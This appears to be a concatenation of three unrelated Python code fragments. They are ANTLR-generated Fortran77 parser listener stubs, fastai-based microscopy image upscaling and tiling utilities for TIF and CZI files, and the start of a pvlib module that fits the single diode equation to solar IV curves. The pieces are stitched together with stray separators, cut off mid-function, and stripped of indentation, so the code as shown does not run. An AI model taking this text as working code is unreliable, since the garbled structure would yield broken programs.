def exitControlNamed(self, ctx:Fortran77Parser.ControlNamedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlName.
def enterControlName(self, ctx:Fortran77Parser.ControlNameContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlName.
def exitControlName(self, ctx:Fortran77Parser.ControlNameContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlSequential.
def enterControlSequential(self, ctx:Fortran77Parser.ControlSequentialContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlSequential.
def exitControlSequential(self, ctx:Fortran77Parser.ControlSequentialContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlDirect.
def enterControlDirect(self, ctx:Fortran77Parser.ControlDirectContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlDirect.
def exitControlDirect(self, ctx:Fortran77Parser.ControlDirectContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlFormatted.
def enterControlFormatted(self, ctx:Fortran77Parser.ControlFormattedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlFormatted.
def exitControlFormatted(self, ctx:Fortran77Parser.ControlFormattedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlUnformatted.
def enterControlUnformatted(self, ctx:Fortran77Parser.ControlUnformattedContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlUnformatted.
def exitControlUnformatted(self, ctx:Fortran77Parser.ControlUnformattedContext):
pass
# Enter a parse tree produced by Fortran77Parser#controlNextrec.
def enterControlNextrec(self, ctx:Fortran77Parser.ControlNextrecContext):
pass
# Exit a parse tree produced by Fortran77Parser#controlNextrec.
def exitControlNextrec(self, ctx:Fortran77Parser.ControlNextrecContext):
pass
# Enter a parse tree produced by Fortran77Parser#closeStatement.
def enterCloseStatement(self, ctx:Fortran77Parser.CloseStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#closeStatement.
def exitCloseStatement(self, ctx:Fortran77Parser.CloseStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#closeControl.
def enterCloseControl(self, ctx:Fortran77Parser.CloseControlContext):
pass
# Exit a parse tree produced by Fortran77Parser#closeControl.
def exitCloseControl(self, ctx:Fortran77Parser.CloseControlContext):
pass
# Enter a parse tree produced by Fortran77Parser#inquireStatement.
def enterInquireStatement(self, ctx:Fortran77Parser.InquireStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#inquireStatement.
def exitInquireStatement(self, ctx:Fortran77Parser.InquireStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#inquireControl.
def enterInquireControl(self, ctx:Fortran77Parser.InquireControlContext):
pass
# Exit a parse tree produced by Fortran77Parser#inquireControl.
def exitInquireControl(self, ctx:Fortran77Parser.InquireControlContext):
pass
# Enter a parse tree produced by Fortran77Parser#backspaceStatement.
def enterBackspaceStatement(self, ctx:Fortran77Parser.BackspaceStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#backspaceStatement.
def exitBackspaceStatement(self, ctx:Fortran77Parser.BackspaceStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#endfileStatement.
def enterEndfileStatement(self, ctx:Fortran77Parser.EndfileStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#endfileStatement.
def exitEndfileStatement(self, ctx:Fortran77Parser.EndfileStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#rewindStatement.
def enterRewindStatement(self, ctx:Fortran77Parser.RewindStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#rewindStatement.
def exitRewindStatement(self, ctx:Fortran77Parser.RewindStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#berFinish.
def enterBerFinish(self, ctx:Fortran77Parser.BerFinishContext):
pass
# Exit a parse tree produced by Fortran77Parser#berFinish.
def exitBerFinish(self, ctx:Fortran77Parser.BerFinishContext):
pass
# Enter a parse tree produced by Fortran77Parser#berFinishItem.
def enterBerFinishItem(self, ctx:Fortran77Parser.BerFinishItemContext):
pass
# Exit a parse tree produced by Fortran77Parser#berFinishItem.
def exitBerFinishItem(self, ctx:Fortran77Parser.BerFinishItemContext):
pass
# Enter a parse tree produced by Fortran77Parser#unitIdentifier.
def enterUnitIdentifier(self, ctx:Fortran77Parser.UnitIdentifierContext):
pass
# Exit a parse tree produced by Fortran77Parser#unitIdentifier.
def exitUnitIdentifier(self, ctx:Fortran77Parser.UnitIdentifierContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatIdentifier.
def enterFormatIdentifier(self, ctx:Fortran77Parser.FormatIdentifierContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatIdentifier.
def exitFormatIdentifier(self, ctx:Fortran77Parser.FormatIdentifierContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatStatement.
def enterFormatStatement(self, ctx:Fortran77Parser.FormatStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatStatement.
def exitFormatStatement(self, ctx:Fortran77Parser.FormatStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#fmtSpec.
def enterFmtSpec(self, ctx:Fortran77Parser.FmtSpecContext):
pass
# Exit a parse tree produced by Fortran77Parser#fmtSpec.
def exitFmtSpec(self, ctx:Fortran77Parser.FmtSpecContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatsep.
def enterFormatsep(self, ctx:Fortran77Parser.FormatsepContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatsep.
def exitFormatsep(self, ctx:Fortran77Parser.FormatsepContext):
pass
# Enter a parse tree produced by Fortran77Parser#formatedit.
def enterFormatedit(self, ctx:Fortran77Parser.FormateditContext):
pass
# Exit a parse tree produced by Fortran77Parser#formatedit.
def exitFormatedit(self, ctx:Fortran77Parser.FormateditContext):
pass
# Enter a parse tree produced by Fortran77Parser#editElement.
def enterEditElement(self, ctx:Fortran77Parser.EditElementContext):
pass
# Exit a parse tree produced by Fortran77Parser#editElement.
def exitEditElement(self, ctx:Fortran77Parser.EditElementContext):
pass
# Enter a parse tree produced by Fortran77Parser#statementFunctionStatement.
def enterStatementFunctionStatement(self, ctx:Fortran77Parser.StatementFunctionStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#statementFunctionStatement.
def exitStatementFunctionStatement(self, ctx:Fortran77Parser.StatementFunctionStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#sfArgs.
def enterSfArgs(self, ctx:Fortran77Parser.SfArgsContext):
pass
# Exit a parse tree produced by Fortran77Parser#sfArgs.
def exitSfArgs(self, ctx:Fortran77Parser.SfArgsContext):
pass
# Enter a parse tree produced by Fortran77Parser#callStatement.
def enterCallStatement(self, ctx:Fortran77Parser.CallStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#callStatement.
def exitCallStatement(self, ctx:Fortran77Parser.CallStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#subroutineCall.
def enterSubroutineCall(self, ctx:Fortran77Parser.SubroutineCallContext):
pass
# Exit a parse tree produced by Fortran77Parser#subroutineCall.
def exitSubroutineCall(self, ctx:Fortran77Parser.SubroutineCallContext):
pass
# Enter a parse tree produced by Fortran77Parser#callArgumentList.
def enterCallArgumentList(self, ctx:Fortran77Parser.CallArgumentListContext):
pass
# Exit a parse tree produced by Fortran77Parser#callArgumentList.
def exitCallArgumentList(self, ctx:Fortran77Parser.CallArgumentListContext):
pass
# Enter a parse tree produced by Fortran77Parser#callArgument.
def enterCallArgument(self, ctx:Fortran77Parser.CallArgumentContext):
pass
# Exit a parse tree produced by Fortran77Parser#callArgument.
def exitCallArgument(self, ctx:Fortran77Parser.CallArgumentContext):
pass
# Enter a parse tree produced by Fortran77Parser#returnStatement.
def enterReturnStatement(self, ctx:Fortran77Parser.ReturnStatementContext):
pass
# Exit a parse tree produced by Fortran77Parser#returnStatement.
def exitReturnStatement(self, ctx:Fortran77Parser.ReturnStatementContext):
pass
# Enter a parse tree produced by Fortran77Parser#expression.
def enterExpression(self, ctx:Fortran77Parser.ExpressionContext):
pass
# Exit a parse tree produced by Fortran77Parser#expression.
def exitExpression(self, ctx:Fortran77Parser.ExpressionContext):
pass
# Enter a parse tree produced by Fortran77Parser#ncExpr.
def enterNcExpr(self, ctx:Fortran77Parser.NcExprContext):
pass
# Exit a parse tree produced by Fortran77Parser#ncExpr.
def exitNcExpr(self, ctx:Fortran77Parser.NcExprContext):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr0.
def enterLexpr0(self, ctx:Fortran77Parser.Lexpr0Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr0.
def exitLexpr0(self, ctx:Fortran77Parser.Lexpr0Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr1.
def enterLexpr1(self, ctx:Fortran77Parser.Lexpr1Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr1.
def exitLexpr1(self, ctx:Fortran77Parser.Lexpr1Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr2.
def enterLexpr2(self, ctx:Fortran77Parser.Lexpr2Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr2.
def exitLexpr2(self, ctx:Fortran77Parser.Lexpr2Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr3.
def enterLexpr3(self, ctx:Fortran77Parser.Lexpr3Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr3.
def exitLexpr3(self, ctx:Fortran77Parser.Lexpr3Context):
pass
# Enter a parse tree produced by Fortran77Parser#lexpr4.
def enterLexpr4(self, ctx:Fortran77Parser.Lexpr4Context):
pass
# Exit a parse tree produced by Fortran77Parser#lexpr4.
def exitLexpr4(self, ctx:Fortran77Parser.Lexpr4Context):
pass
# Enter a parse tree produced by Fortran77Parser#aexpr0.
| |
    if trim_x_start != 0: x_seams.add(trim_x_start)
    if trim_y_start != 0: y_seams.add(trim_y_start)
blur_rects = []
blur_size = 5
for x_seam in x_seams:
left = x_seam - blur_size
right = x_seam + blur_size
top, bottom = 0, h
blur_rects.append((slice(top, bottom), slice(left, right)))
for y_seam in y_seams:
top = y_seam - blur_size
bottom = y_seam + blur_size
left, right = 0, w
blur_rects.append((slice(top, bottom), slice(left, right)))
for xs,ys in blur_rects:
assembled[xs,ys] = gaussian(assembled[xs,ys], sigma=1.0)
# if assembled.min() < 0: assembled -= assembled.min()
# assembled += imax
# assembled *= imax
# assembled *= (ma - mi)
# assembled += mi
return assembled.astype(np.float32).clip(0.,1.)
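The seam-rectangle bookkeeping above can be checked without numpy or skimage. `seam_rects` below is a hypothetical helper reproducing the slice construction; the clamping at the image border is an added assumption (the loop above can produce negative slice starts near the edges):

```python
def seam_rects(x_seams, y_seams, h, w, blur_size=5):
    """Build (row-slice, col-slice) rectangles straddling each seam, as the
    blur loop above does; border clamping is an added assumption."""
    rects = []
    for x in x_seams:
        # vertical seam: full height, a narrow band of columns around the seam
        rects.append((slice(0, h),
                      slice(max(x - blur_size, 0), min(x + blur_size, w))))
    for y in y_seams:
        # horizontal seam: full width, a narrow band of rows around the seam
        rects.append((slice(max(y - blur_size, 0), min(y + blur_size, h)),
                      slice(0, w)))
    return rects
```

Each rectangle can then be passed to a blur exactly as `assembled[xs, ys] = gaussian(...)` does above.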
def unet_image_from_tiles(learn, in_img, tile_sz=128, scale=4):
cur_size = in_img.shape[1:3]
c = in_img.shape[0]
new_size = (cur_size[0] * scale, cur_size[1] * scale)
w, h = cur_size
in_tile = torch.zeros((c, tile_sz // scale, tile_sz // scale))
out_img = torch.zeros((1, w * scale, h * scale))
tile_sz //= scale
for x_tile in range(math.ceil(w / tile_sz)):
for y_tile in range(math.ceil(h / tile_sz)):
            x_start = x_tile * tile_sz
x_end = min(x_start + tile_sz, w)
y_start = y_tile * tile_sz
y_end = min(y_start + tile_sz, h)
in_tile[:, 0:(x_end - x_start), 0:(y_end - y_start)] = tensor(
in_img[:, x_start:x_end, y_start:y_end])
img = Image(tensor(npzoom(in_tile[0], scale, order=1)[None]))
out_tile, _, _ = learn.predict(img)
out_x_start = x_start * scale
out_x_end = x_end * scale
out_y_start = y_start * scale
out_y_end = y_end * scale
#print("out: ", out_x_start, out_y_start, ",", out_x_end, out_y_end)
in_x_start = 0
in_y_start = 0
in_x_end = (x_end - x_start) * scale
in_y_end = (y_end - y_start) * scale
#print("tile: ",in_x_start, in_y_start, ",", in_x_end, in_y_end)
out_img[:, out_x_start:out_x_end, out_y_start:
out_y_end] = out_tile.data[:, in_x_start:in_x_end,
in_y_start:in_y_end]
return out_img
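The tile index arithmetic in `unet_image_from_tiles` (ceil-divide the extent, clamp the last tile at the edge) can be sketched in isolation; `tile_bounds` is a pure-Python illustration, not part of the original API:

```python
import math

def tile_bounds(length, tile_sz):
    """Yield (start, end) pairs covering [0, length) in steps of tile_sz,
    clamping the final tile at the edge as the loops above do."""
    for t in range(math.ceil(length / tile_sz)):
        start = t * tile_sz
        yield start, min(start + tile_sz, length)
```

Consecutive pairs abut exactly, so the reassembled output has no gaps and no double-written pixels.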
def tif_predict_movie(learn,
tif_in,
orig_out='orig.tif',
pred_out='pred.tif',
size=128,
wsize=3):
im = PIL.Image.open(tif_in)
im.load()
times = im.n_frames
#times = min(times,100)
imgs = []
if times < (wsize + 2):
print(f'skip {tif_in} only {times} frames')
return
for i in range(times):
im.seek(i)
imgs.append(np.array(im).astype(np.float32) / 255.)
img_data = np.stack(imgs)
def pull_frame(i):
im.seek(i)
im.load()
return np.array(im)
preds = []
origs = []
img_max = img_data.max()
x, y = im.size
#print(f'tif: x:{x} y:{y} t:{times}')
for t in progress_bar(list(range(0, times - wsize + 1))):
img = img_data[t:(t + wsize)].copy()
img /= img_max
out_img = unet_multi_image_from_tiles(learn,
img,
tile_sz=size,
wsize=wsize)
pred = (out_img * 255).cpu().numpy().astype(np.uint8)
preds.append(pred)
orig = (img[1][None] * 255).astype(np.uint8)
origs.append(orig)
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(
pred_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None) # for mp4
all_y = img_to_uint8(np.concatenate(origs))
imageio.mimwrite(orig_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None)
def czi_predict_movie(learn,
czi_in,
orig_out='orig.tif',
pred_out='pred.tif',
size=128,
wsize=3):
with czifile.CziFile(czi_in) as czi_f:
proc_axes, proc_shape = get_czi_shape_info(czi_f)
channels = proc_shape['C']
depths = proc_shape['Z']
times = proc_shape['T']
#times = min(times, 100)
x, y = proc_shape['X'], proc_shape['Y']
#print(f'czi: x:{x} y:{y} t:{times} z:{depths}')
if times < (wsize + 2):
print(f'skip {czi_in} only {times} frames')
return
#folder_name = Path(pred_out).stem
#folder = Path(folder_name)
#if folder.exists(): shutil.rmtree(folder)
#folder.mkdir()
data = czi_f.asarray().astype(np.float32) / 255.
preds = []
origs = []
img_max = data.max()
#print(img_max)
for t in progress_bar(list(range(0, times - wsize + 1))):
idx = build_index(
proc_axes, {
'T': slice(t, t + wsize),
'C': 0,
'Z': 0,
'X': slice(0, x),
'Y': slice(0, y)
})
img = data[idx].copy()
img /= img_max
out_img = unet_multi_image_from_tiles(learn,
img,
tile_sz=size,
wsize=wsize)
pred = (out_img * 255).cpu().numpy().astype(np.uint8)
preds.append(pred)
#imsave(folder/f'{t}.tif', pred[0])
orig = (img[wsize // 2][None] * 255).astype(np.uint8)
origs.append(orig)
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(
pred_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None) # for mp4
all_y = img_to_uint8(np.concatenate(origs))
imageio.mimwrite(orig_out, all_y,
bigtiff=True) #, fps=30, macro_block_size=None)
def generate_movies(dest_dir, movie_files, learn, size, wsize=5):
for fn in progress_bar(movie_files):
ensure_folder(dest_dir)
pred_name = dest_dir/f'{fn.stem}_pred.tif'
orig_name = dest_dir/f'{fn.stem}_orig.tif'
if not Path(pred_name).exists():
if fn.suffix == '.czi':
# print(f'czi {fn.stem}')
czi_predict_movie(learn,
fn,
size=size,
orig_out=orig_name,
pred_out=pred_name,
wsize=wsize)
elif fn.suffix == '.tif':
tif_predict_movie(learn,
fn,
size=size,
orig_out=orig_name,
pred_out=pred_name,
wsize=wsize)
tif_fn = fn
# print(f'tif {fn.stem}')
else:
print(f'skip: {fn.stem} - doesn\'t exist')
def max_to_use(img):
return np.iinfo(np.uint8).max if img.dtype == np.uint8 else img.max()
def img_to_uint8(img, img_info=None):
img = img.copy()
    if img_info and img_info['dtype'] != np.uint8:
        img -= img.min()
        img /= img.max()
        img *= np.iinfo(np.uint8).max
return img.astype(np.uint8)
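`img_to_uint8` is a min-max rescale to the 8-bit range. The same arithmetic on a plain list of floats (a sketch with no numpy; the constant-input guard is an added assumption) looks like:

```python
def to_uint8_values(values):
    """Min-max scale floats to 0..255 and round, mirroring the
    normalization in img_to_uint8; a constant input maps to all zeros."""
    lo, hi = min(values), max(values)
    scale = 255.0 / (hi - lo) if hi > lo else 0.0
    return [int(round((v - lo) * scale)) for v in values]
```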
def img_to_float(img):
dtype = img.dtype
img_max = max_to_use(img)
img = img.astype(np.float32).copy()
mi, ma = np.percentile(img, [2,99.99])
img_range = ma - mi
real_max = img.max()
return img, {'img_max': img_max, 'real_max': real_max, 'mi': mi, 'ma': ma, 'dtype':dtype }
def tif_predict_images(learn,
tif_in,
dest,
category,
tag=None,
size=128,
max_imgs=None):
    under_tag = '_' if tag is None else f'_{tag}_'
dest_folder = Path(dest / category)
dest_folder.mkdir(exist_ok=True, parents=True)
pred_out = dest_folder / f'{tif_in.stem}{under_tag}pred.tif'
orig_out = dest_folder / f'{tif_in.stem}{under_tag}orig.tif'
if pred_out.exists():
print(f'{pred_out.stem} exists')
return
im = PIL.Image.open(tif_in)
im.load()
times = im.n_frames
    if max_imgs is not None: times = min(max_imgs, times)
imgs = []
for i in range(times):
im.seek(i)
im.load()
imgs.append(np.array(im))
imgs, img_info = img_to_float(np.stack(imgs))
preds = []
x, y = im.size
print(f'tif: x:{x} y:{y} t:{times}')
    for t in progress_bar(list(range(times))):
        img = imgs[t].copy()
        # run each frame through the tiled predictor, mirroring czi_predict_images
        pred = unet_image_from_tiles_blend(learn, img[None], tile_sz=size,
                                           img_info=img_info)
        preds.append(pred[None])
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(pred_out, all_y, bigtiff=True)
shutil.copy(tif_in, orig_out)
def czi_predict_images(learn,
czi_in,
dest,
category,
tag=None,
size=128,
max_imgs=None):
with czifile.CziFile(czi_in) as czi_f:
        under_tag = '_' if tag is None else f'_{tag}_'
dest_folder = Path(dest / category)
dest_folder.mkdir(exist_ok=True, parents=True)
proc_axes, proc_shape = get_czi_shape_info(czi_f)
channels = proc_shape['C']
depths = proc_shape['Z']
times = proc_shape['T']
        if max_imgs is not None: times = min(max_imgs, times)
x, y = proc_shape['X'], proc_shape['Y']
data, img_info = img_to_float(czi_f.asarray())
orig_dtype = data.dtype
img_max = data.max()
print(f'czi: x:{x} y:{y} t:{times} c:{channels} z:{depths} {img_max}')
channels_bar = progress_bar(
range(channels)) if channels > 1 else range(channels)
depths_bar = progress_bar(
range(depths)) if depths > 1 else range(depths)
times_bar = progress_bar(range(times)) if times > 1 else range(times)
for c in channels_bar:
for z in depths_bar:
preds = []
origs = []
if (depths > 1) or (channels > 1):
pred_out = dest_folder / f'{czi_in.stem}_c{c:02d}_z{z:02d}_{under_tag}_pred.tif'
orig_out = dest_folder / f'{czi_in.stem}_c{c:02d}_z{z:02d}_{under_tag}_orig.tif'
else:
pred_out = dest_folder / f'{czi_in.stem}_{under_tag}_pred.tif'
orig_out = dest_folder / f'{czi_in.stem}_{under_tag}_orig.tif'
if not pred_out.exists():
for t in times_bar:
idx = build_index(
proc_axes, {
'T': t,
'C': c,
'Z': z,
'X': slice(0, x),
'Y': slice(0, y)
})
img = data[idx].copy()
pred = unet_image_from_tiles_blend(learn,
img[None],
tile_sz=size,
img_info=img_info)
preds.append(pred[None])
origs.append(img[None])
if len(preds) > 0:
all_y = img_to_uint8(np.concatenate(preds))
imageio.mimwrite(pred_out, all_y, bigtiff=True)
all_y = img_to_uint8(np.concatenate(origs))
imageio.mimwrite(orig_out, all_y, bigtiff=True)
def generate_tifs(src, dest, learn, size, tag=None, max_imgs=None):
for fn in progress_bar(src):
category = fn.parts[-3]
try:
if fn.suffix == '.czi':
czi_predict_images(learn,
fn,
dest,
category,
size=size,
tag=tag,
max_imgs=max_imgs)
elif fn.suffix == '.tif':
tif_predict_images(learn,
fn,
dest,
category,
size=size,
tag=tag,
max_imgs=max_imgs)
except Exception as e:
print(f'exception with {fn.stem}')
print(e)
def ensure_folder(fldr, clean=False):
fldr = Path(fldr)
if fldr.exists() and clean:
print(f'wiping {fldr.stem} in 5 seconds')
sleep(5.)
shutil.rmtree(fldr)
if not fldr.exists(): fldr.mkdir(parents=True, mode=0o775, exist_ok=True)
return fldr
def subfolders(p):
return [sub for sub in p.iterdir() if sub.is_dir()]
def build_tile_info(data, tile_sz, train_samples, valid_samples, only_categories=None, skip_categories=None):
    if skip_categories is None: skip_categories = []
    if only_categories is None: only_categories = []
if only_categories: skip_categories = [c for c in skip_categories if c not in only_categories]
def get_category(p):
return p.parts[-2]
def get_mode(p):
return p.parts[-3]
def is_only(fn):
return (not only_categories) or (get_category(fn) in only_categories)
def is_skip(fn):
return get_category(fn) in skip_categories
def get_img_size(p):
with PIL.Image.open(p) as img:
            w, h = img.size  # PIL.Image.size is (width, height)
        return h, w
all_files = [fn for fn in list(data.glob('**/*.tif')) if is_only(fn) and not is_skip(fn)]
img_sizes = {str(p):get_img_size(p) for p in progress_bar(all_files)}
files_by_mode = {}
for p in progress_bar(all_files):
category = get_category(p)
mode = get_mode(p)
mode_list = files_by_mode.get(mode, {})
cat_list = mode_list.get(category, [])
cat_list.append(p)
mode_list[category] = cat_list
files_by_mode[mode] = mode_list
def pull_random_tile_info(mode, tile_sz):
files_by_cat = files_by_mode[mode]
category=random.choice(list(files_by_cat.keys()))
img_file=random.choice(files_by_cat[category])
h,w = img_sizes[str(img_file)]
return {'mode': mode,'category': category,'fn': img_file, 'tile_sz': tile_sz, 'h': h, 'w':w}
tile_infos = []
for i in range(train_samples):
tile_infos.append(pull_random_tile_info('train', tile_sz))
for i in range(valid_samples):
tile_infos.append(pull_random_tile_info('valid', tile_sz))
tile_df = pd.DataFrame(tile_infos)[['mode','category','tile_sz','h','w','fn']]
return tile_df
def draw_tile(img, tile_sz):
max_x,max_y = img.shape
x = random.choice(range(max_x-tile_sz)) if max_x > tile_sz else 0
y = random.choice(range(max_y-tile_sz)) if max_y > tile_sz else 0
xs = slice(x,min(x+tile_sz, max_x))
ys = slice(y,min(y+tile_sz, max_y))
tile = img[xs,ys].copy()
return tile, (xs,ys)
def check_tile(img, thresh, thresh_pct):
return (img > thresh).mean() > thresh_pct
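`check_tile` accepts a tile when the fraction of pixels above `thresh` exceeds `thresh_pct`. The same acceptance rule applied to a flat pixel list (a hypothetical pure-Python helper):

```python
def tile_passes(pixels, thresh, thresh_pct):
    """True when the fraction of values above thresh exceeds thresh_pct --
    the rule check_tile applies when sampling candidate tiles."""
    above = sum(1 for p in pixels if p > thresh)
    return (above / len(pixels)) > thresh_pct
```

`draw_random_tile` keeps re-sampling until this predicate passes, halving `thresh_pct` once half the tries are spent.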
def draw_random_tile(img_data, tile_sz, thresh, thresh_pct):
max_tries = 200
found_tile = False
tries = 0
while not found_tile:
tile, (xs,ys) = draw_tile(img_data, tile_sz)
found_tile = check_tile(tile, thresh, thresh_pct)
# found_tile = True
tries += 1
if tries > (max_tries/2): thresh_pct /= 2
if | |
"""
The ``sde`` module contains functions to fit the single diode equation.
Function names should follow the pattern "fit_" + fitting method.
"""
import numpy as np
from pvlib.ivtools.utils import _schumaker_qspline
# set constant for numpy.linalg.lstsq parameter rcond
# rcond=-1 for numpy<1.14, rcond=None for numpy>=1.14
# TODO remove after minimum numpy version >= 1.14
minor = int(np.__version__.split('.')[1])
if minor < 14:
RCOND = -1
else:
RCOND = None
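The version check above can be factored into a testable helper; `rcond_for` is a hypothetical name, not part of the module, and like the original it assumes a numpy 1.x version string:

```python
def rcond_for(numpy_version):
    """Pick the lstsq rcond argument: -1 for numpy < 1.14, None otherwise,
    matching the module-level RCOND selection above (assumes a 1.x string)."""
    minor = int(numpy_version.split('.')[1])
    return -1 if minor < 14 else None
```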
def fit_sandia_simple(voltage, current, v_oc=None, i_sc=None, v_mp_i_mp=None,
vlim=0.2, ilim=0.1):
r"""
Fits the single diode equation (SDE) to an IV curve.
Parameters
----------
voltage : ndarray
1D array of `float` type containing voltage at each point on the IV
curve, increasing from 0 to ``v_oc`` inclusive. [V]
current : ndarray
1D array of `float` type containing current at each point on the IV
curve, from ``i_sc`` to 0 inclusive. [A]
v_oc : float, default None
Open circuit voltage. If not provided, ``v_oc`` is taken as the
last point in the ``voltage`` array. [V]
i_sc : float, default None
Short circuit current. If not provided, ``i_sc`` is taken as the
first point in the ``current`` array. [A]
v_mp_i_mp : tuple of float, default None
Voltage, current at maximum power point. If not provided, the maximum
power point is found at the maximum of ``voltage`` \times ``current``.
[V], [A]
vlim : float, default 0.2
Defines portion of IV curve where the exponential term in the single
diode equation can be neglected, i.e.
``voltage`` <= ``vlim`` x ``v_oc``. [V]
ilim : float, default 0.1
Defines portion of the IV curve where the exponential term in the
single diode equation is significant, approximately defined by
``current`` < (1 - ``ilim``) x ``i_sc``. [A]
Returns
-------
photocurrent : float
photocurrent [A]
saturation_current : float
dark (saturation) current [A]
resistance_series : float
series resistance [ohm]
resistance_shunt : float
shunt (parallel) resistance [ohm]
nNsVth : float
product of thermal voltage ``Vth`` [V], diode ideality factor
``n``, and number of series cells ``Ns``. [V]
Raises
------
    RuntimeError
        if parameter extraction is not successful.
Notes
-----
Inputs ``voltage``, ``current``, ``v_oc``, ``i_sc`` and ``v_mp_i_mp`` are
assumed to be from a single IV curve at constant irradiance and cell
temperature.
:py:func:`fit_sandia_simple` obtains values for the five parameters for
the single diode equation [1]_:
.. math::
I = I_{L} - I_{0} (\exp \frac{V + I R_{s}}{nNsVth} - 1)
- \frac{V + I R_{s}}{R_{sh}}
See :py:func:`pvsystem.singlediode` for definition of the parameters.
The extraction method [2]_ proceeds in six steps.
1. In the single diode equation, replace :math:`R_{sh} = 1/G_{p}` and
re-arrange
.. math::
I = \frac{I_{L}}{1 + G_{p} R_{s}} - \frac{G_{p} V}{1 + G_{p} R_{s}}
- \frac{I_{0}}{1 + G_{p} R_{s}} (\exp(\frac{V + I R_{s}}{nN_sV_{th}})
- 1)
2. The linear portion of the IV curve is defined as
:math:`V \le vlim \times v_{oc}`. Over this portion of the IV curve,
.. math::
\frac{I_{0}}{1 + G_{p} R_{s}} (\exp(\frac{V + I R_{s}}{nN_sV_{th}})
- 1) \approx 0
3. Fit the linear portion of the IV curve with a line.
.. math::
I &\approx \frac{I_{L}}{1 + G_{p} R_{s}}
- \frac{G_{p}}{1 + G_{p}R_{s}} V
&= \beta_{0} + \beta_{1} V
4. The exponential portion of the IV curve is defined by
:math:`\beta_{0} + \beta_{1} \times V - I > ilim \times i_{sc}`.
Over this portion of the curve,
:math:`\exp((V + IR_s)/{nN_sV_{th}}) \gg 1` so that
.. math::
\exp(\frac{V + I R_{s}}{nN_sV_{th}}) - 1 \approx
\exp(\frac{V + I R_{s}}{nN_sV_{th}})
5. Fit the exponential portion of the IV curve.
.. math::
\log(\beta_{0} - \beta_{1} V - I)
&\approx \log(\frac{I_{0}}{1 + G_{p} R_{s}} + \frac{V}{nN_sV_{th}}
+ \frac{I R_{s}}{nN_sV_{th}}) \\
&= \beta_{2} + \beta_{3} V + \beta_{4} I
6. Calculate values for ``IL, I0, Rs, Rsh,`` and ``nNsVth`` from the
    regression coefficients :math:`\beta_{0}, \beta_{1}, \beta_{3}` and
:math:`\beta_{4}`.
References
----------
.. [1] <NAME>, <NAME>, <NAME>, "Applied Photovoltaics" ISBN
0 86758 909 4
.. [2] <NAME>, <NAME>, "Single Diode Parameter Extraction from
In-Field Photovoltaic I-V Curves on a Single Board Computer", 46th IEEE
Photovoltaic Specialist Conference, Chicago, IL, 2019
"""
# If not provided, extract v_oc, i_sc, v_mp and i_mp from the IV curve data
if v_oc is None:
v_oc = voltage[-1]
if i_sc is None:
i_sc = current[0]
if v_mp_i_mp is not None:
v_mp, i_mp = v_mp_i_mp
else:
v_mp, i_mp = _find_mp(voltage, current)
# Find beta0 and beta1 from linear portion of the IV curve
beta0, beta1 = _sandia_beta0_beta1(voltage, current, vlim, v_oc)
# Find beta3 and beta4 from the exponential portion of the IV curve
beta3, beta4 = _sandia_beta3_beta4(voltage, current, beta0, beta1, ilim,
i_sc)
# calculate single diode parameters from regression coefficients
return _sandia_simple_params(beta0, beta1, beta3, beta4, v_mp, i_mp, v_oc)
def _find_mp(voltage, current):
"""
Finds voltage and current at maximum power point.
Parameters
----------
voltage : ndarray
1D array containing voltage at each point on the IV curve, increasing
from 0 to v_oc inclusive, of `float` type. [V]
current : ndarray
1D array containing current at each point on the IV curve, decreasing
from i_sc to 0 inclusive, of `float` type. [A]
Returns
-------
v_mp, i_mp : tuple
voltage ``v_mp`` and current ``i_mp`` at the maximum power point. [V],
[A]
"""
p = voltage * current
idx = np.argmax(p)
return voltage[idx], current[idx]
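`_find_mp` simply takes the argmax of the elementwise power. A pure-Python sketch of the same selection (hypothetical helper name):

```python
def find_mp(voltage, current):
    """Return (v, i) where the elementwise product V*I peaks,
    as _find_mp does with np.argmax."""
    powers = [v * i for v, i in zip(voltage, current)]
    idx = powers.index(max(powers))
    return voltage[idx], current[idx]
```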
def _sandia_beta0_beta1(v, i, vlim, v_oc):
# Used by fit_sandia_simple.
# Get intercept and slope of linear portion of IV curve.
    # Start with V <= vlim * v_oc, extend by adding points until slope is
# negative (downward).
beta0 = np.nan
beta1 = np.nan
